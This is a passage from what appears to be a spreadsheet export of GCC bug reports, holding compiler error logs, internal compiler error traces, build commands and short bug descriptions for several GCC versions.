   char*)' cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:957: error: a function call cannot appear in
   a constant-expression
/usr/local/include/c++/3.3/limits:958: error: `
   std::numeric_limits::has_quiet_NaN' cannot appear in a
   constant-expression
/usr/local/include/c++/3.3/limits:973: error: `
   std::numeric_limits::has_infinity' cannot appear in a
   constant-expression
/usr/local/include/c++/3.3/limits:973: error: `
   std::numeric_limits::has_quiet_NaN' cannot appear in a
   constant-expression
/usr/local/include/c++/3.3/limits:1013: error: `long double
   __builtin_huge_vall()' cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:1013: error: a function call cannot appear in
   a constant-expression
/usr/local/include/c++/3.3/limits:1013: error: `long double
   __builtin_huge_vall()' cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:1013: error: a function call cannot appear in
   a constant-expression
/usr/local/include/c++/3.3/limits:1015: error: `long double
   __builtin_nanl(const char*)' cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:1015: error: a function call cannot appear in
   a constant-expression
/usr/local/include/c++/3.3/limits:1015: error: `long double
   __builtin_nanl(const char*)' cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:1015: error: a function call cannot appear in
   a constant-expression
/usr/local/include/c++/3.3/limits:1016: error: `std::numeric_limits&lt;long
   double&gt;::has_quiet_NaN' cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:1032: error: `std::numeric_limits&lt;long
   double&gt;::has_infinity' cannot appear in a constant-expression
/usr/local/include/c++/3.3/limits:1032: error: `std::numeric_limits&lt;long
   double&gt;::has_quiet_NaN' cannot appear in a constant-expression
In file included from AskTell.defs.hh:30
                 from mc91.cc:2:
/usr/local/include/c++/3.3/bits/stl_tree.h: In constructor `
   std::_Rb_tree_base::_Rb_tree_base(const typename
   std::_Rb_tree_alloc_base&lt;_Tp _Alloc std::_Alloc_traits&lt;_Tp
   _Allocator&gt;::_S_instanceless&gt;::allocator_type&amp;)':
/usr/local/include/c++/3.3/bits/stl_tree.h:579: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In destructor `
   std::_Rb_tree_base::~_Rb_tree_base()':
/usr/local/include/c++/3.3/bits/stl_tree.h:580: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `
   std::_Rb_tree_node*&amp; std::_Rb_tree&lt;_Key _Val _KeyOfValue _Compare
   _Alloc&gt;::_M_root() const':
/usr/local/include/c++/3.3/bits/stl_tree.h:648: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `
   std::_Rb_tree_node*&amp; std::_Rb_tree&lt;_Key _Val _KeyOfValue _Compare
   _Alloc&gt;::_M_leftmost() const':
/usr/local/include/c++/3.3/bits/stl_tree.h:651: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `
   std::_Rb_tree_node*&amp; std::_Rb_tree&lt;_Key _Val _KeyOfValue _Compare
   _Alloc&gt;::_M_rightmost() const':
/usr/local/include/c++/3.3/bits/stl_tree.h:654: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In copy constructor `
   std::_Rb_tree::_Rb_tree(const
   std::_Rb_tree&amp;)':
/usr/local/include/c++/3.3/bits/stl_tree.h:740: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h:741: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `void
   std::_Rb_tree&lt;_Key _Val _KeyOfValue _Compare
   _Alloc&gt;::_M_empty_initialize()':
/usr/local/include/c++/3.3/bits/stl_tree.h:756: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h:759: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h:760: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `
   std::_Rb_tree_iterator std::_Rb_tree&lt;_Key _Val
   _KeyOfValue _Compare _Alloc&gt;::end()':
/usr/local/include/c++/3.3/bits/stl_tree.h:775: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `
   std::_Rb_tree_iterator std::_Rb_tree&lt;_Key
   _Val _KeyOfValue _Compare _Alloc&gt;::end() const':
/usr/local/include/c++/3.3/bits/stl_tree.h:778: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `void
   std::_Rb_tree&lt;_Key _Val _KeyOfValue _Compare
   _Alloc&gt;::swap(std::_Rb_tree&amp;)':
/usr/local/include/c++/3.3/bits/stl_tree.h:804: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `void
   std::_Rb_tree::clear()':
/usr/local/include/c++/3.3/bits/stl_tree.h:848: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h:850: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `
   std::_Rb_tree&amp;
   std::_Rb_tree::operator=(const
   std::_Rb_tree&amp;)':
/usr/local/include/c++/3.3/bits/stl_tree.h:958: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h:959: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h:963: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `typename
   std::_Rb_tree::iterator
   std::_Rb_tree&lt;_Key _Val _KeyOfValue _Compare
   _Alloc&gt;::_M_insert(std::_Rb_tree_node_base* std::_Rb_tree_node_base* const
   _Val&amp;)':
/usr/local/include/c++/3.3/bits/stl_tree.h:982: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h:988: error: `_M_header' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_tree.h:1007: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `typename
   std::_Rb_tree::iterator
   std::_Rb_tree::insert_equal(const
   _Val&amp;)':
/usr/local/include/c++/3.3/bits/stl_tree.h:1018: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `
   std::pair&lt;typename std::_Rb_tree&lt;_Key _Val _KeyOfValue _Compare
   _Alloc&gt;::iterator bool&gt; std::_Rb_tree&lt;_Key _Val _KeyOfValue _Compare
   _Alloc&gt;::insert_unique(const _Val&amp;)':
/usr/local/include/c++/3.3/bits/stl_tree.h:1036: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `typename
   std::_Rb_tree::iterator
   std::_Rb_tree&lt;_Key _Val _KeyOfValue _Compare
   _Alloc&gt;::insert_unique(std::_Rb_tree_iterator const
   _Val&amp;)':
/usr/local/include/c++/3.3/bits/stl_tree.h:1063: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h:1073: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `typename
   std::_Rb_tree::iterator
   std::_Rb_tree&lt;_Key _Val _KeyOfValue _Compare
   _Alloc&gt;::insert_equal(std::_Rb_tree_iterator const
   _Val&amp;)':
/usr/local/include/c++/3.3/bits/stl_tree.h:1105: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h:1115: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `void
   std::_Rb_tree&lt;_Key _Val _KeyOfValue _Compare
   _Alloc&gt;::erase(std::_Rb_tree_iterator)':
/usr/local/include/c++/3.3/bits/stl_tree.h:1171: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h:1172: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h:1173: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `typename
   std::_Rb_tree::iterator
   std::_Rb_tree::find(const _Key&amp;)
   ':
/usr/local/include/c++/3.3/bits/stl_tree.h:1267: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `typename
   std::_Rb_tree::const_iterator
   std::_Rb_tree::find(const _Key&amp;)
   const':
/usr/local/include/c++/3.3/bits/stl_tree.h:1287: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `typename
   std::_Rb_tree::iterator
   std::_Rb_tree::lower_bound(const
   _Key&amp;)':
/usr/local/include/c++/3.3/bits/stl_tree.h:1319: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `typename
   std::_Rb_tree::const_iterator
   std::_Rb_tree::lower_bound(const
   _Key&amp;) const':
/usr/local/include/c++/3.3/bits/stl_tree.h:1337: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `typename
   std::_Rb_tree::iterator
   std::_Rb_tree::upper_bound(const
   _Key&amp;)':
/usr/local/include/c++/3.3/bits/stl_tree.h:1355: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `typename
   std::_Rb_tree::const_iterator
   std::_Rb_tree::upper_bound(const
   _Key&amp;) const':
/usr/local/include/c++/3.3/bits/stl_tree.h:1373: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h: In member function `bool
   std::_Rb_tree::__rb_verify()
   const':
/usr/local/include/c++/3.3/bits/stl_tree.h:1431: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h:1431: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h:1431: error: `_M_header' has not
   been declared
/usr/local/include/c++/3.3/bits/stl_tree.h:1431: error: `_M_header' has not
   been declared
In file included from AskTell.defs.hh:32
                 from mc91.cc:2:
/usr/local/include/c++/3.3/bits/stl_list.h: In constructor `
   std::_List_base::_List_base(const typename
   std::_List_alloc_base&lt;_Tp _Alloc std::_Alloc_traits&lt;_Tp
   _Allocator&gt;::_S_instanceless&gt;::allocator_type&amp;)':
/usr/local/include/c++/3.3/bits/stl_list.h:304: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_list.h:305: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_list.h:305: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_list.h:306: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_list.h:306: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_list.h: In destructor `std::_List_base&lt;_Tp
   _Alloc&gt;::~_List_base()':
/usr/local/include/c++/3.3/bits/stl_list.h:313: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_list.h: In member function `
   std::_List_iterator std::list::begin()':
/usr/local/include/c++/3.3/bits/stl_list.h:569: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_list.h: In member function `
   std::_List_iterator std::list&lt;_Tp
   _Alloc&gt;::begin() const':
/usr/local/include/c++/3.3/bits/stl_list.h:576: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_list.h: In member function `
   std::_List_iterator std::list::end()':
/usr/local/include/c++/3.3/bits/stl_list.h:583: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_list.h: In member function `
   std::_List_iterator std::list&lt;_Tp
   _Alloc&gt;::end() const':
/usr/local/include/c++/3.3/bits/stl_list.h:590: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_list.h: In member function `bool
   std::list::empty() const':
/usr/local/include/c++/3.3/bits/stl_list.h:628: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_list.h:628: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/stl_list.h: In member function `void
   std::list::swap(std::list&amp;)':
/usr/local/include/c++/3.3/bits/stl_list.h:910: error: `_M_node' has not been
   declared
In file included from AskTell.defs.hh:32
                 from mc91.cc:2:
/usr/local/include/c++/3.3/bits/list.tcc: In member function `void
   std::_List_base::__clear()':
/usr/local/include/c++/3.3/bits/list.tcc:72: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc:73: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc:80: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc:80: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc:81: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc:81: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc: In member function `void
   std::list::sort()':
/usr/local/include/c++/3.3/bits/list.tcc:253: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc:253: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc:253: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc:253: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc: In member function `void
   std::list::sort(_StrictWeakOrdering)':
/usr/local/include/c++/3.3/bits/list.tcc:343: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc:343: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc:343: error: `_M_node' has not been
   declared
/usr/local/include/c++/3.3/bits/list.tcc:343: error: `_M_node' has not been
   declared
In file included from mc91.cc:2:
AskTell.inlines.hh: At global scope:
AskTell.inlines.hh:130: error: ISO C++ forbids declaration of `iterator' with
   no type
AskTell.inlines.hh:130: error: invalid use of undefined type `struct
   std::_List_iterator'
/usr/local/include/c++/3.3/bits/stl_list.h:144: error: declaration of `struct
   std::_List_iterator'
AskTell.inlines.hh:130: error: template definition of non-template `int
   std::_List_iterator::iterator()'
AskTell.inlines.hh:134: error: expected function-definition
AskTell.inlines.hh:140: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[roberto@zoltan tmp]$</t>
  </si>
  <si>
    <t>GCC-27830</t>
  </si>
  <si>
    <t>[4.1 regression] ICE: verify_stmts failed (invalid operand to unary operator)</t>
  </si>
  <si>
    <t>I get the following ICE with gcc 4.2.  This looks suspiciously a lot like 
PR26994 but the patch suggested there is Fortran specific whereas my test case is C++.  Maybe there is a more fundamental problem somewhere?
(sid)3300:tbm@test: ~/delta/bin] /usr/lib/gcc-snapshot/bin/g++ -c -O mini.c
mini.c: In member function 'camp::drawElement* camp::drawPath::transformed(const camp::transform&amp;)':
mini.c:87: error: invalid operand to unary operator
mini.c:87: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
zsh: exit 1     /usr/lib/gcc-snapshot/bin/g++ -c -O mini.c
(sid)3301:tbm@test: ~/delta/bin] /usr/lib/gcc-snapshot/bin/g++ -c mini.c
(sid)3302:tbm@test: ~/delta/bin]</t>
  </si>
  <si>
    <t>GCC-44762</t>
  </si>
  <si>
    <t>score/predicates.md warnings</t>
  </si>
  <si>
    <t>gcc -c   -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../../gcc/gcc -I../../../gcc/gcc/. -I../../../gcc/gcc/../include -I../../../gcc/gcc/../libcpp/include  -I../../../gcc/gcc/../libdecnumber -I../../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber  -DCLOOG_PPL_BACKEND  -I/usr/include/libelf  insn-preds.c -o insn-preds.o
../../../gcc/gcc/config/score/predicates.md: In function â€˜score_load_multiple_operation_1â€™:
../../../gcc/gcc/config/score/predicates.md:92:7: error: variable â€˜src_addrâ€™ set but not used [-Werror=unused-but-set-variable]
../../../gcc/gcc/config/score/predicates.md: In function â€˜score_store_multiple_operation_1â€™:
../../../gcc/gcc/config/score/predicates.md:127:7: error: variable â€˜dest_addrâ€™ set but not used [-Werror=unused-but-set-variable]
cc1: all warnings being treated as errors
make[1]: *** [insn-preds.o] Error 1
make[1]: Leaving directory `/user/inria/fsf/multi/score-elf/gcc'
make: *** [all-gcc] Error 2</t>
  </si>
  <si>
    <t>GCC-13907</t>
  </si>
  <si>
    <t>[3.3 regression] valid conversion rejected unless -pedantic is set</t>
  </si>
  <si>
    <t>struct A {
  operator int 
  operator const int 
}
void f(int 
void f(const int 
int main() {
  const A x = A()
  f(x)
}
gives
const_overload.cpp: In function `int main()':
const_overload.cpp:12: error: call of overloaded `f(const A&amp;)' is ambiguous
const_overload.cpp:7: error: candidates are: void f(int&amp;)
const_overload.cpp:8: error:                 void f(const int&amp;)
unless -pedantic is set.</t>
  </si>
  <si>
    <t>japple</t>
  </si>
  <si>
    <t>GCC-7977</t>
  </si>
  <si>
    <t>[3.2/3.3 regression] structs in anonymous union</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
g++-3.2 (GCC) 3.2.1 20020912 (Debian prerelease)</t>
  </si>
  <si>
    <t>ehlert</t>
  </si>
  <si>
    <t>GCC-66820</t>
  </si>
  <si>
    <t>[5/6 Regression] internal compiler error: in get_expr_operands at tree-ssa-operands.c:910</t>
  </si>
  <si>
    <t>Created attachment 35938
Code to reproduce the bug
Hi
I get this error when compiling a C code using OpenMP since the upgrade to GCC 5.1 it was compiling without error with GCC 4.9. I'm using Archlinux.
The attached merging.c file is the C code where I removed everything I could to get a minimal code to reproduce the bug. If I remove the strcat call in the omp parallel block (and replace it with the commented sprintf) then it compiles.
The C code is wrapped in a python module below is the compilation log:
$ LANG=C python setup.py build_ext -i 
running build_ext
building 'libCmethods' extension
gcc -pthread -fno-strict-aliasing -march=x86-64 -mtune=generic -O2 -pipe -fstack-protector-strong --param=ssp-buffer-size=4 -DNDEBUG -march=x86-64 -mtune=generic -O2 -pipe -fstack-protector-strong --param=ssp-buffer-size=4 -fPIC -I/usr/include/python2.7 -c src/tools.c -o build/temp.linux-x86_64-2.7/src/tools.o -freport-bug -fopenmp
gcc -pthread -fno-strict-aliasing -march=x86-64 -mtune=generic -O2 -pipe -fstack-protector-strong --param=ssp-buffer-size=4 -DNDEBUG -march=x86-64 -mtune=generic -O2 -pipe -fstack-protector-strong --param=ssp-buffer-size=4 -fPIC -I/usr/include/python2.7 -c src/subtract_slice_median.c -o build/temp.linux-x86_64-2.7/src/subtract_slice_median.o -freport-bug -fopenmp
gcc -pthread -fno-strict-aliasing -march=x86-64 -mtune=generic -O2 -pipe -fstack-protector-strong --param=ssp-buffer-size=4 -DNDEBUG -march=x86-64 -mtune=generic -O2 -pipe -fstack-protector-strong --param=ssp-buffer-size=4 -fPIC -I/usr/include/python2.7 -c src/merging.c -o build/temp.linux-x86_64-2.7/src/merging.o -freport-bug -fopenmp
src/merging.c: In function 'mpdaf_merging_median._omp_fn.0':
src/merging.c:36:1: internal compiler error: in get_expr_operands at tree-ssa-operands.c:910
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/simon/ccsj0rjP.out file please attach this to your bugreport.
error: command 'gcc' failed with exit status 1</t>
  </si>
  <si>
    <t>GCC-1383</t>
  </si>
  <si>
    <t>gcj: command not found (during make)</t>
  </si>
  <si>
    <t xml:space="preserve">From: Alexandre Petit-Bianco 
To: mech20@home.com
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: gcj/355: gcj: command not found (during make)
Date: Tue 10 Oct 2000 23:25:58 -0700 (PDT)
 mech20@home.com writes:
 &gt; I really don't know what to do from this point so I'm trying here
 &gt; it may just be some misconfiguration on my system I don't know but
 &gt; any help would be great thanks. =)
 Short answer: Gcc and Libgcj are still two separate trees and they
 need to be built installed (and eventually pointed at) separately.
 This should change fairly soon.
 Long answer: I think I see what's wrong. You haven't built gcc yet
 (you have a gcc installed on your system but it most likely doesn't
 feature gcj.) So first get the gcc source tree (you could start by
 downloading a snapshot: http://gcc.gnu.org/snapshots.html) build and
 install it (http://gcc.gnu.org/install/index.html) tell your system
 where gcj should be found (that is where you specified things should
 be installed during the configuration of gcc suffixed by bin -- if
 you specified --prefix= as an argument to `configure' then
 gcj will be install under /bin after you did a `make
 install') by adjusting and properly exporting PATH and then you can
 configure and build libgcj gcj will be picked up when needed if your
 PATH is right. As a sanity check try `which gcj' first before
 configuring and building libgcj.
 ./A
</t>
  </si>
  <si>
    <t>mech20</t>
  </si>
  <si>
    <t>GCC-16249</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE in calculate_live_on_entry at tree-ssa-live.c:724</t>
  </si>
  <si>
    <t>Found while building rhino from rhug with gcj.  This is a relatively recent
regression I was able to build it from HEAD when I tried it last (2 weeks ago?)
No small test case yet. 
 gcj --encoding=ISO-8859-1 -Wno-deprecated -fno-assert
--classpath=upstream/src:upstream/toolsrc:/home/green/sources/jhbuild-src/rhug/rhino/upstream/src:/home/green/sources/jhbuild-src/rhug/rhino/upstream/toolsrc:/home/green/sources/jhbuild-src/rhug/rhino/../gnu.readline/upstream/src
-fassume-compiled -g -O2 -MT upstream/src/org/mozilla/javascript/Interpreter.lo
-MD -MP -MF upstream/src/org/mozilla/javascript/.deps/Interpreter.Tpo -c
/home/green/sources/jhbuild-src/rhug/rhino/upstream/src/org/mozilla/javascript/Interpreter.java
 -fPIC -o upstream/src/org/mozilla/javascript/.libs/Interpreter.o
pc.6350_12292 is defined  in BB1252 by:
pc.6350_12292 = pc_21623
It is also live-on-entry to entry BB 0 So it appears to have multiple defs.
pc.6350_12294 is defined  in BB1232 by:
pc.6350_12294 = pc_21625
It is also live-on-entry to entry BB 0 So it appears to have multiple defs.
pc.6350_12296 is defined  in BB1110 by:
pc.6350_12296 = pc_21643
It is also live-on-entry to entry BB 0 So it appears to have multiple defs.
pc.6350_12298 is defined  in BB1080 by:
pc.6350_12298 = pc_21645
It is also live-on-entry to entry BB 0 So it appears to have multiple defs.
pc.6350_12300 is defined  in BB1060 by:
pc.6350_12300 = pc_21647
It is also live-on-entry to entry BB 0 So it appears to have multiple defs.
pc.6350_12302 is defined  in BB1040 by:
pc.6350_12302 = pc_21649
It is also live-on-entry to entry BB 0 So it appears to have multiple defs.
pc.6350_12315 is defined  in BB799 by:
pc.6350_12315 = pc_21684
It is also live-on-entry to entry BB 0 So it appears to have multiple defs.
pc.6350_12317 is defined  in BB779 by:
pc.6350_12317 = pc_21686
It is also live-on-entry to entry BB 0 So it appears to have multiple defs.
/home/green/sources/jhbuild-src/rhug/rhino/upstream/src/org/mozilla/javascript/Interpreter.java:1375:
internal compiler error: in calculate_live_on_entry at tree-ssa-live.c:724
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-6436</t>
  </si>
  <si>
    <t>dwarf2out ICE with typedef using attributes</t>
  </si>
  <si>
    <t xml:space="preserve">Hi
When compiling an empty file with just #include  with:
	g++ -O2 -g -c foo.cpp 
It dies with:
	/usr/include/asm/sigcontext.h:49: Internal compiler error in modified_type_die at dwarf2out.c:7570
Preprocessed output in How-To-Repeat section.
Ciao Marcus
Release:
3.1 20020415 (prerelease)
Environment:
	s390x
How-To-Repeat:
$ g++ -v --save-temps -g -O2 -c foo.cpp
Reading specs from /usr/lib64/gcc-lib/s390x-suse-linux/3.1/specs
Configured with: ../configure --enable-threads=posix --prefix=/usr --with-local-prefix=/usr/local --infodir=/usr/share/info --mandir=/usr/share/man --enable-languages=cc++f77objc --disable-libgcj --with-gxx-include-dir=/usr/include/g++ --with-slibdir=/lib --with-system-zlib --enable-shared --libdir=/usr/lib64 --enable-checking s390x-suse-linux
Thread model: posix
gcc version 3.1 20020415 (prerelease)
GNU CPP version 3.1 20020415 (prerelease) (cpplib) (Linux for zSeries)
#include ... search starts here:
#include  search starts here:
 /usr/include/g++
 /usr/include/g++/s390x-suse-linux
 /usr/include/g++/backward
 /usr/local/include
 /usr/lib64/gcc-lib/s390x-suse-linux/3.1/include
 /usr/s390x-suse-linux/include
 /usr/include
End of search list.
 /usr/lib64/gcc-lib/s390x-suse-linux/3.1/cc1plus -fpreprocessed foo.ii -fno-caller-saves -quiet -dumpbase foo.cpp -g -O2 -version -fno-caller-saves -o foo.s
GNU CPP version 3.1 20020415 (prerelease) (cpplib) (Linux for zSeries)
GNU C++ version 3.1 20020415 (prerelease) (s390x-suse-linux)
        compiled by GNU C version 3.1 20020415 (prerelease).
In file included from /usr/include/bits/sigcontext.h:28
                 from /usr/include/signal.h:307
                 from foo.cpp:1:
/usr/include/asm/sigcontext.h:49: Internal compiler error in modified_type_die
   at dwarf2out.c:7570
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ 
See attachments for foo.ii.gz
</t>
  </si>
  <si>
    <t>GCC-9424</t>
  </si>
  <si>
    <t>i/ostream::operator&gt;&gt;/&lt;&lt;(streambuf*) drops characters</t>
  </si>
  <si>
    <t>basic_istream::operator&gt;&gt;(basic_streambuf*) and basic_ostream::operator*) drop characters on the floor by extracting characters from the source before they have been successfully inserted into the sink.
This seems to happen only if the source is unbuffered if the source is buffered extraction happens after insertion as required.
Release:
gcc-3.2.1
Environment:
Red Hat Linux 8.0
How-To-Repeat:
See attachment.</t>
  </si>
  <si>
    <t>GCC-27659</t>
  </si>
  <si>
    <t>ICE on autovect-branch</t>
  </si>
  <si>
    <t>Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-vect/configure --enable-languages=cc++ --prefix=/usr/local/vect
Thread model: posix
gcc version 4.2.0-autovect 20060518 (experimental)
 /usr/local/vect/libexec/gcc/i686-pc-linux-gnu/4.2.0-autovect/cc1plus -E -quiet -v -I/home/doerfler/ltilib-2/41/linux -I../src/basics -I../src/types -I../src/math -I../src/imgProc -I../src/ioBasics -I../src/io -I../src/draw -I../src/viewer -I../src/system -I../src/classifiers -Iworkbench -I../tester -I/usr/include/cairo -I/usr/include/freetype2 -I/usr/X11R6/include -I/usr/include/libpng12 -I/opt/gnome/include/gtk-2.0 -I/opt/gnome/lib/gtk-2.0/include -I/opt/gnome/include/atk-1.0 -I/opt/gnome/include/pango-1.0 -I/opt/gnome/include/glib-2.0 -I/opt/gnome/lib/glib-2.0/include -D_GNU_SOURCE -D_REENTRANT -D_BSD_SOURCE -D_XOPEN_SOURCE=500 -D_REENTRANT -DNDEBUG ../src/math/ltiSecondOrderStatistics.cpp -march=pentium-m -ansi -Wundef -Wwrite-strings -Wall -ftree-vectorize -ftree-vectorizer-verbose=2 -fpic -O3 -fpch-preprocess -o ltiSecondOrderStatistics.ii
/usr/local/vect/libexec/gcc/i686-pc-linux-gnu/4.2.0-autovect/cc1plus -fpreprocessed ltiSecondOrderStatistics.ii -quiet -dumpbase ltiSecondOrderStatistics.cpp -march=pentium-m -ansi -auxbase-strip ../obj/release/ltiSecondOrderStatistics.o -O3 -Wundef -Wwrite-strings -Wall -ansi -version -ftree-vectorize -ftree-vectorizer-verbose=2 -fpic -o ltiSecondOrderStatistics.s
GNU C++ version 4.2.0-autovect 20060518 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 4.2.0-autovect 20060518 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: ce12e1a5e2bda479d797d2bc5f9a8466
../src/math/ltiSecondOrderStatistics_template.h:368: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:368: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:428: note: not vectorized: unhandled data-ref
../src/math/ltiSecondOrderStatistics_template.h:428: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:428: note: not vectorized: unhandled data-ref
../src/math/ltiSecondOrderStatistics_template.h:428: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:368: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:428: note: not vectorized: unhandled data-ref
../src/math/ltiSecondOrderStatistics_template.h:428: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:428: note: not vectorized: unhandled data-ref
../src/math/ltiSecondOrderStatistics_template.h:428: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:428: note: not vectorized: unhandled data-ref
../src/math/ltiSecondOrderStatistics_template.h:428: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:334: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:428: note: not vectorized: unhandled data-ref
../src/math/ltiSecondOrderStatistics_template.h:428: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:428: note: not vectorized: unhandled data-ref
../src/math/ltiSecondOrderStatistics_template.h:428: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:334: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:334: note: not vectorized: unhandled data-ref
../src/math/ltiSecondOrderStatistics_template.h:334: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:334: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:334: note: not vectorized: unhandled data-ref
../src/math/ltiSecondOrderStatistics_template.h:334: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:334: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:334: note: vectorized 0 loops in function.
../src/math/ltiSecondOrderStatistics_template.h:368: note: not vectorized: unhandled data-ref
../src/math/ltiSecondOrderStatistics_template.h:368: note: vectorized 0 loops in function.
